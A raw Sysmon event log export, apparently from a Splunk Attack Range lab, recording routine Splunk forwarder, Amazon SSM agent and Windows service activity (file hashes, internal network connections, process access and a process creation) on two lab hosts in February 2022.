23542300x8000000000000000221500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:38.999{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-161MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:40.858{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=515CB6F82E3B47BA54088DC7C236B768,SHA256=7172F738E1C2CE1B45C36C58D6AE26AC7F8009E2574B8CC8538A912EE31B76A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:40.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=515F532C31B82B8C0C796F8D699FD48F,SHA256=BFCAB1D38EE471428D06B63D93F59AC774A121322EB8D813A2BDACFB0F448372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:40.484{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:41.874{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE11BB5A7B3D3226749A7C16171F232E,SHA256=3179AFB4BB408FA98FC3DDCA0399A506DEA42FA0BC7793C5EF0D8795002B03A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:41.981{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86AECF6A7B0B5E3A5094BD8B29A432A3,SHA256=079725165E8E6D3607814D364E04DBCB050B9700D19EB7AAD09CCE8F6BE664E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:42.991{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF86EFE90F08B97B81DBD9E6F65C13E,SHA256=E19ABC654DE1B4D08727D78F7C1A8614A21FABCB248322D863041EECB48AD57D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:39.920{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49468-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000297683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:43.998{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02DF2E0CF61D71253F45DDC9870259D7,SHA256=DDD20CA2363D48176907656BF740B53C636BDF25492A0550BDCB4DE21D0642F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:43.031{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3422288AFB7C878A7508FF0166D1171B,SHA256=2B66D63283BEF2364EE6545D4819C86A4FE7B3B37CE4EAD224A67980CC93169B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:40.544{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51657-false10.0.1.12-8000- 10341000x8000000000000000221533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17D8-6216-1705-000000003902}1780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-17D8-6216-1705-000000003902}1780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.655{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17D8-6216-1705-000000003902}1780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.656{4F8D34B0-17D8-6216-1705-000000003902}1780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000221520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.374{4F8D34B0-17D8-6216-1605-000000003902}9641152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17D8-6216-1605-000000003902}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:44.155{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 